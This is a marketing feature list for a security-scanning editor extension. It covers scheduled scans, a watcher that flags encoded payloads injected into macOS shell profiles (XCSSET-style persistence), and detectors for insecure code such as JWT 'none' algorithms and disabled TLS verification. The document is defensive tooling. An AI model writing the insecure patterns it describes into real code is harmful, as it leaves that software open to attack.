Vibe Owl Pro

The scheduler runs two interleaved cycles without manual intervention. Light cycles scan the active file, git history, dependencies, and environment every 8 minutes. Deep cycles run full workspace scans every 30 minutes when the editor is idle for 3+ minutes.

• Light cycle: active file secrets, git history (40 commits), dependency guard, env audit, staged diff preview
• Deep cycle: full workspace code scan, full git history, full dependency and environment analysis, host health check
• Free users can trigger a single deep cycle manually — the periodic scheduler is Pro-only

A filesystem watcher monitors macOS shell startup files in real time. The moment a monitored file is modified or created, Vibe Owl runs a host health check. Suspicious payloads trigger an immediate warning modal with a 1-click repair action.

• Monitors ~/.zshrc, ~/.zprofile, ~/.bash_profile, ~/.bashrc, ~/.profile
• Catches XCSSET-style persistence that injects encoded payloads into shell profiles
• Warning modal appears the instant injection happens — before the next terminal session executes it

Regression Guard tracks which findings existed at a known-good point in time, then alerts when new risks appear. Set a baseline, and every subsequent scan reports only newly introduced findings with a severity breakdown.

• Baseline snapshots hash each finding by detector, severity, title, evidence, file path, and line number
• Catches regressions: a fix that reintroduces a vulnerability, a new dependency with a known-bad pattern, or a teammate's commit with a hardcoded secret
• Continuous tracking runs automatically after each scan against the stored baseline

Eight additional detection rules target application-level vulnerabilities beyond secret detection. Four rules fire on all files in real time. Four boundary detectors fire only on server-side files to catch API-layer risks.

• Real-time rules: JWT algorithm:none bypass, deprecated crypto.createCipher, disabled TLS certificate verification, HTTPS agent with TLS disabled
• Boundary rules: Express JSON parser without body-size limits, unbounded pagination input, Multer upload without size/type guardrails, missing route-level rate limiting
• 49 total detectors (41 free + 8 Pro) covering secrets, credentials, code risks, and application vulnerabilities

Pro vulnerability detectors fire during active editing — not just on save. An instant toast notification appears the moment a detected vulnerability is written, with a 45-second cooldown per unique detector and line combination to prevent notification spam.

• Alerts fire on medium, high, and critical severity findings only
• Example: "Vibe Owl Pro real-time alert (high): JWT with algorithm 'none' detected (line 42)"
• Catches vulnerabilities in AI-generated code the instant Cursor or Copilot writes them

Extends the free dependency guard with deeper package manifest and lockfile analysis. Flags projects with excessive dependency counts, prerelease versions, lifecycle script exposure, deprecated packages, external registry resolutions, and insecure HTTP URLs in lockfiles.

• Package manifest: 180+ dependencies = high risk, 90+ = medium risk, detects prerelease versions and lifecycle script shell execution
• Lockfile: counts install scripts, deprecated packages, 0.x versions, external resolutions, and insecure HTTP URLs
• Findings tagged with category "intel" to distinguish from basic dependency issues

Generates a comprehensive security report as a Markdown file. The report collects all findings from code scanning, git history, dependencies, environment, and host health into a single document with workspace name, health score, and health rating.

• Saved to .vibe-owl-reports/security-learning-report-{timestamp}.md
• Opens automatically in the editor after generation
• Covers every scan module: code, git, dependencies, environment, host health

Exports the same security learning report as a styled PDF document using PDFKit. Same comprehensive content as the Markdown report, formatted for sharing with teams, compliance reviews, or audit trails.

• Professional formatting for stakeholder communication
• Same data as Markdown report: findings, health score, severity breakdown
• Ready for compliance documentation and security audits